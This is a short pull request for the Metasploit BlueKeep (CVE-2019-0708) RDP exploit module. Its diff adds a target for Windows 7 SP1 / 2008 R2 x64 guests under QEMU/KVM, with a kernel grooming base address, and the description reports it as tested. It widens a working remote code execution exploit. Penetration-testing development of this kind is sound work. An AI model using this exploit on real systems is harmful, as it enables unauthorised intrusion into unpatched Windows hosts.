### PR TITLE
Add QEMU/KVM target for CVE-2019-0708

### DIFF
--- a/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
+++ b/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
@@ -185,6 +185,14 @@ class MetasploitModule < Msf::Exploit::Remote
               'GROOMBASE' => 0xfffffa8018c08000
             }
           ],
+          [
+            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'GROOMBASE' => 0xfffffa8004428000
+            }
+          ],
         ],
       'DefaultTarget' => 0,
       'DisclosureDate' => 'May 14 2019',


### PR DESCRIPTION
Add a new target for CVE-2019-0708.

Tested with QEMU/KVM.